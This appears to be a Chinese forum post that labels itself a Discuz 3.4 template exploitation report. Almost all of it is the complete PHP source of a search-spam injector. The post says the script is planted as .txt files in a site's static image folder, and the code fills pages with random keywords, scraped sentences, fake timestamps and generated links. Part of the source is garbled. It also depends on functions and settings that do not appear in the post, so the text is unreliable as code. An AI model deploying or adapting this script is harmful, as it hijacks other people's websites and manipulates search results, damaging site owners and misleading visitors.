|
|
Discuz 3.4某APP模板漏洞利用报告:黑链随机关键字随机文章内容缓存注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
- <?php
- @error_reporting(E_ERROR);
- @date_default_timezone_set("Etc/GMT-8");
- @ini_set('memory_limit', '2048M');
- $app_Jack_Tpl = new app_Jack_Tpl();
- $app_Jack_Tpl->loadTpl();
- $app_Jack_kwd = file(APP_JACK_KEYWORD);
- $app_Jack_atl = file(APP_JACK_ARTICLE);
- $app_Jack_core = new app_Jack_Core($app_Jack_kwd,$app_Jack_atl);
- $app_Jack_core->run();
- $app_Jack_var = $app_Jack_core->getStore();
- if(APP_JACK_CACHED=="cached"){
- return "<explode>".app_Jack_Cache::encode($app_Jack_var)."</explode>";
- exit();
- }
- $app_Jack_Tpl->extra($app_Jack_var);
- return $app_Jack_Tpl->show();
- class app_Jack_Tpl{
- public $page;
- public $domain;
- public function loadTpl(){
- if(file_exists(APP_JACK_TEMPLATE)){
- $this->page = file_get_contents(APP_JACK_TEMPLATE);
- }
- else
- {
- die();
- }
- }
- public function extra($var){
- if(!$this->page){
- die("");
- }
- foreach($var as $k=>$v){
- $this->page = str_replace("{".$k."}",$v,$this->page);
- }
- $this->page = str_replace("{domain}","",$this->page);
- }
- public function show(){
- return $this->page;
- }
- }
- class app_Jack_Core{
- public $kwd = ""; //关键字数字
- public $atl = ""; //文章数组 ""; /lic $kwdCount = 0;
- public $atlCount = 0;
- public $config = array();
- public $store = array();
- public $linkstyle = "";
- //其中$domain_config
- function __construct($kwd,$atl){
- $this->kwd = $kwd;
- $this->atl = $atl;
- //
- $this->kwdCount = count($kwd)-1;
- $this->atlCount = count($atl)-1;
- //
- }
- public function run(){
- $id = mt_rand(0,$this->kwdCount);
- $this->store['标题'] = trim($this->kwd[$id]);
- $this->store['非空格标题'] = str_replace(" ","",trim($this->kwd[$id]));
- //加入上下词语
- if($id==$this->kwdCount){
- $nextId = $id-2;
- }
- else
- {
- $nextId = $id+1;
- }
- $this->store['下关键字'] = trim($this->kwd[$nextId]);
- $this->store['上关键字'] = trim($this->kwd[$id-1]);
- //随机。
- for($a=0;$a<=20;$a++){
- $this->store['随机关键字'.$a] = trim($this->kwd[mt_rand(0,$this->kwdCount)]);
- }
- //随机文章
- for($a=0;$a<=20;$a++){
- $this->store['随机段落'.$a] = trim($this->atl[mt_rand(0,$this->atlCount)]);
- }
- for($a=0;$a<=10;$a++){
- $this->store['随机图片'.$a] = getImg();
- }
- $this->store['系统图片'] =getImg();
- $tempArray = array();
- //随机60范围内
- for($a=0;$a<30;$a++){
- $akid = $id+$a;
- if($akid>=$this->kwdCount){
- $akid = abs($this->kwdCount-$akid);
- }
- $tempArray[] = $akid;
- $akid = abs($id-$a);
- $tempArray[] = $akid;
- }
- array_unique($tempArray);
- shuffle($tempArray);
- for($a=0;$a<=10;$a++){
- $this->store['相关关键字'.$a] = trim($this->kwd[$tempArray[$a]]);
- $this->store['相关关键字链接'.$a] = App_GetLink();
- }
- //
- $this->store['下关键字'] = $this->store['随机关键字1'];
- $this->store['上关键字'] = $this->store['随机关键字2'];
- //修复
- $this->store['下关键字链接'] = App_GetLink();
- $this->store['上关键字链接'] = App_GetLink();
- for($a=0;$a<=30;$a++){
- $this->store['随机关键字'.$a] = trim($this->kwd[mt_rand(0,$this->kwdCount)]);
- }
- //随机链接
- for($a=0;$a<=30;$a++){
- $this->store['随机链接'.$a] = App_GetLink();
- }
- $this->store['随机链接'.$a] = App_GetLink();
- for($a=1;$a<=15;$a++){
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $this->store['随机句子'.$a] = self::getSentence(trim($senDB),6,12);
- }
- $this->store['混合标题'] = "";
- if(file_exists(APP_MIX_KWD_FILE)){
- $midKwd= file(APP_MIX_KWD_FILE);
- $getMidKwd = $midKwd[mt_rand(1,count($midKwd)-1)];
- $getMidKwd = App_Jack_article_auto::insert_tags($getMidKwd,1);
- $getMidKwd = str_replace("{tag}",$this->store['标题'],$getMidKwd);
- $this->store['混合标题'] = trim($getMidKwd);
- }
- if(file_exists(APP_JACK_DES)){
- $manDes = file(APP_JACK_DES);
- $manDesContent = trim($manDes[mt_rand(0,count($manDes)-1)]);
- $manDesContent = str_replace("{subtitle}",$this->store['标题'],$manDesContent);
- $manDesContent = str_replace("{标题}",$this->store['标题'],$manDesContent);
- $manDesContent = str_replace("{混合标题}",$this->store['标题'],$manDesContent);
- $this->store['手动描述'] = trim($manDesContent);
- }
- if(file_exists(APP_JACK_BIANLIANG)){
- $randVar = file(APP_JACK_BIANLIANG);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)];
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量'.$a] = trim($tmpVar);
- }
- }
- if(file_exists(APP_JACK_BIANLIANG_B)){
- $randVar = file(APP_JACK_BIANLIANG_B);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)];
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量B'.$a] = trim($tmpVar);
- }
- }
- if(file_exists(APP_JACK_BIANLIANG_C)){
- $randVar = file(APP_JACK_BIANLIANG_C);
- $countRandVar = count($randVar)-1;
- for($a=1;$a<=10;$a++){
- $tmpVar = $randVar[mt_rand(0,$countRandVar)];
- $tmpVar = str_replace("{标题}",$this->store['标题'],$tmpVar);
- $tmpVar = str_replace("{混合标题}",$this->store['混合标题'],$tmpVar);
- $senDB = trim($this->atl[mt_rand(1,$this->atlCount)]).trim($this->atl[mt_rand(1,$this->atlCount)]);
- $sen = self::getSentence(trim($senDB),6,12);
- $tmpVar = str_replace("{随机句子}",$sen,$tmpVar);
- $this->store['随机变量C'.$a] = trim($tmpVar);
- }
- }
- for($ca=1;$ca<=10;$ca++){
- $this->store['随机数字'.$ca] = mt_rand(1,1000);
- }
- //随机文章
- $this->store['时间戳'] = date("Y-m-d");
- $this->store['时间戳精准'] = date("Y-m-d H:i:s");
- $this->store['精准时间'] = date("Y-m-d H:i:s");
- $this->store['倒数时间'] = date("Y-m-d H:i:s",mt_rand((time()-(1*24*3600)),time()));
- $timeStampArray = array();
- for($a=0;$a<10;$a++){
- $timeStampArray[] = mt_rand((time()-(1*24*3600)),time());
- }
- sort($timeStampArray);
- for($a=1;$a<=10;$a++){
- $timeid = $a-1;
- $this->store['精准时间'.$a] = date("Y-m-d H:i:s",$timeStampArray[$timeid]);
- }
- $this->store['自身链接'] = App_GetSelf();
- $this->store['中文时间戳'] = date("Y年m月d日");
- $this->store['中文精准时间'] = date("Y年m月d日 H点i分s秒");
- $article_auto = new App_Jack_article_auto();
- $article_auto->init($this->atl,$this->atlCount);
- $article_copy = $article_auto->autoArticle();
- $this->store['系统文章2'] = $article_copy;
- $this->store['系统描述2'] = $article_auto->getDes($this->store['标题'],$this->store['下关键字']);
- $this->store['系统文章2'] = str_replace("{title}",$this->store['标题'],$this->store['系统文章2']);
- $this->store['系统文章2'] = str_replace("{backword}",$this->store['上关键字'],$this->store['系统文章2']);
- $this->store['系统文章2'] = str_replace("{nextword}",$this->store['下关键字'],$this->store['系统文章2']);
- $array = array();
- $array[] = $this->store['标题'];
- $array[] = $this->store['下关键字'];
- $this->store['系统描述2'] = $article_auto->getDes($this->store['标题'],$this->store['下关键字']);
- $this->store['系统描述2'] = str_replace("{title}",$this->store['标题'],$this->store['系统描述2']);
- $this->store['系统描述2'] = str_replace("{backword}",$this->store['上关键字'],$this->store['系统描述2']);
- $this->store['系统描述2'] = str_replace("{nextword}",$this->store['下关键字'],$this->store['系统描述2']);
-
- ///论坛描述标签
- $this->store['论坛描述'] = '{title}{rand1}{nexttitle}';
- $this->store['论坛描述'] = str_replace("{title}",$this->store['标题'],$this->store['论坛描述']);
- $this->store['论坛描述'] = str_replace("{rand1}",$this->store['随机段落1'],$this->store['论坛描述']);
- $this->store['论坛描述'] = str_replace("{nexttitle}",$this->store['上关键字'],$this->store['论坛描述']);
- }
- public function getSentence($str,$min,$max){
- $str = app_Jack_String::filter_mark($str);
- $strlen = app_Jack_String::abslength($str);
- $randId = rand(0,$strlen-10);
- if($strlen < $max){
- return $str;
- }
- $newSen = app_Jack_String::substr($str, $randId, mt_rand($min,$max));
- if(app_Jack_String::strlen($str)==0){
- return $str;
- }
- return $newSen;
- }
- public function cut($file,$from,$end)
- {
- $message=explode($from,$file);
- $message=explode($end,$message[1]);
- return $message[0];
- }
- public function getStore(){
- return $this->store;
- }
- }
- class App_Jack_article_auto{
- public $title = "";
- public $nextTitle = "";
- public $backTitle = "";
- public $articleDb = ""; //文章库
- public $articleCount = "";
- public $des = "";
- public $content = "";
- public function init($articleDb,$articleCount){
- $this->articleDb = $articleDb;
- $this->articleCount = $articleCount;
- }
- public function autoArticle($min=3,$max=3){
- $article = $this->articleDb;
- $count = $this->articleCount;
- shuffle($article);
- $content = "";
- $norepeat = array();
- $returncontent = array();
- $maxPar = mt_rand(APP_JACK_MIN_PAR,APP_JACK_MAX_PAR);
- for($a=0;$a<$maxPar;$a++){
- $sence = rand(APP_JACK_MIN,APP_JACK_MAX);
- //开始组合句子...
- $parContent = "";
- for($b=1;$b<$sence+1;$b++){
- $parContent .=trim($article[mt_rand(0,$count)]);
- }
- $returncontent[$a] = $parContent;
- }
- $returncontent[0] = self::insert_start($returncontent[0]);
- for($a=1;$a<$maxPar;$a++){
- $returncontent[$a] = self::insert_tags($returncontent[$a],2);
- }
- //传入第一段,用来穿插关键字用。
- $replaceTag = array("{title}","{backword}","{nextword}");
- $returncontent[0] = str_replace("{tag}","{title},{nextword}",$returncontent[0]);
- $this->content = $returncontent[0];
- for($a=1;$a<$maxPar;$a++){
- $count = substr_count($returncontent[$a],"{tag}");
- for($b=0;$b<$count+1;$b++){
- $returncontent[$a] = preg_replace("/{tag}/",$replaceTag[mt_rand(0,2)],$returncontent[$a],1);
- }
- }
- $return = "";
- foreach($returncontent as $par){
- $return .="<p>".$par."</p>\n";
- }
- return $return;
- }
- public function getDes($title,$nexttitle){
- $this->content = str_replace("{title}",$title,$this->content);
- $this->content = str_replace("{nextword}",$nexttitle,$this->content);
- $length = mt_rand(50,80); //至少20~30个字起,外加关键字长度,保证描述出现关键字
- $length += app_Jack_String::strlen($title);
- $length += app_Jack_String::strlen($nexttitle);
- return app_Jack_String::substr($this->content,0,$length+8);
- }
- public function insert_start($str){
- $times = 1; //关键字出现频率
- $keyword = "{tag}"; //要替换的关键字
- $strlen = app_Jack_String::strlen($str);
- for ( $i = 0; $i < $times; $i ++ )
- {
- $arr[] = mt_rand(0, 30);
- }
- $arr = array_unique($arr); //过滤数组重复元素
- sort($arr);
- $i = 0;
- $str_new = "";
- foreach( $arr as $v )
- {
- $str_new .= app_Jack_String::substr($str, $i, $v - $i) . $keyword;
- $i = $v;
- }
- $str_new .= app_Jack_String::substr($str, $i, $strlen - $i);
- return $str_new;
- }
-
- public function insert_tags($str,$times){
- $keyword = "{tag}"; //要替换的关键字
- $strlen = app_Jack_String::strlen($str);
- for ( $i = 0; $i < $times; $i ++ )
- {
- $arr[] = mt_rand(0, $strlen);
- }
- $arr = array_unique($arr); //过滤数组重复元素
- sort($arr);
- $i = 0;
- $str_new = "";
- foreach( $arr as $v )
- {
- $str_new .= app_Jack_String::substr($str, $i, $v - $i) . $keyword;
- $i = $v;
- }
- $str_new .= app_Jack_String::substr($str, $i, $strlen - $i);
- return $str_new;
- }
- }
- class app_Jack_Cache{
- //写入缓存
- public function write($file,$filename){
- return file_put_contents($filename,self::encode($file));
- }
-
- public function read($filename){
- $content = file_get_contents($filename);
- return self::decode($content);
- }
- public function encode($file){
- return base64_encode(gzcompress(serialize($file)));
- }
- public function decode($file){
- return unserialize(gzuncompress(base64_decode($file)));
- }
- }
- class app_Jack_String{
- public function filter_mark($text){
- $array = array(";",";","【","】",",","。","、","?","》","《","|",":","“","”","=","-","~","’",'‘',"!","!","-","(",")","(",")","*","&","……","^","$","@","#");
- if(trim($text)=='')return '';
- $text = str_replace($array,"",$text);
- $text = str_replace(" ","",$text);
- return trim($text);
- }
- //字符串截取函数
- public function substr($str, $start = 0, $length = 0) {
- /* 该编码每个非英文字符的字节长度 */
- $encode = APP_JACK_CHARSET;
- $encode_len = $encode == 'UTF-8' ? 3 : 2;
- for($byteStart = $i = 0; $i < $start; ++$i) {
- $byteStart += ord($str{$byteStart}) < 128 ? 1 : $encode_len;
- if( @$str{$byteStart} == '' ) return '';
- }
- for($i = 0, $byteLen = $byteStart; $i < $length; ++$i){
- @$byteLen += @ord($str{$byteLen}) < 128 ? 1 : $encode_len;
- }
- return substr( $str, $byteStart, $byteLen-$byteStart );
- }
- public function iconvStr($from,$to,$fContents)
- {
- if(is_string($fContents) )
- {
- if(function_exists('mb_convert_encoding'))
- {
- return mb_convert_encoding ($fContents, $to, $from);
- }
- else if(function_exists('iconv'))
- {
- return iconv($from,$to,$fContents);
- }
- else
- {
- return $fContents;
- }
- }
- }
- public function strlen($str){
- if(APP_JACK_CHARSET=="UTF-8"){
- return self::strlen_utf8($str);
- }
- else
- {
- return self::strlen_gbk($str);
- }
- }
- public function strlen_gbk($str){
- $len=strlen($str);
- $i=0;
- while($i<$len)
- {
- if(preg_match("/^[".chr(0xa1)."-".chr(0xff)."]+$/",$str[$i]))
- {
- $i+=2;
- }
- else
- {
- $i+=1;
- }
- }
- return $i/2;
- }
- public function strlen_utf8($str) {
- $i = 0;
- $count = 0;
- $len = strlen ($str);
- while ($i < $len) {
- $chr = ord ($str[$i]);
- $count++;
- $i++;
- if($i >= $len) break;
- if($chr & 0x80) {
- $chr <<= 1;
- while ($chr & 0x80) {
- $i++;
- $chr <<= 1;
- }
- }
- }
- return $count;
- }
- public function abslength($str)
- {
- if(empty($str)){
- return 0;
- }
- if(function_exists('mb_strlen')){
- return mb_strlen($str,APP_JACK_CHARSET);
- }
- else {
- if(APP_JACK_CHARSET=="UTF-8"){
- return self::strlen_utf8($str);
- }else
- {
- return self::strlen_gbk($str);
- }
- return $b;
- }
- }
- }
- ?>
|
|
帐号登录
QQ登录
微信登录
发表于 2018-2-7 11:30:21
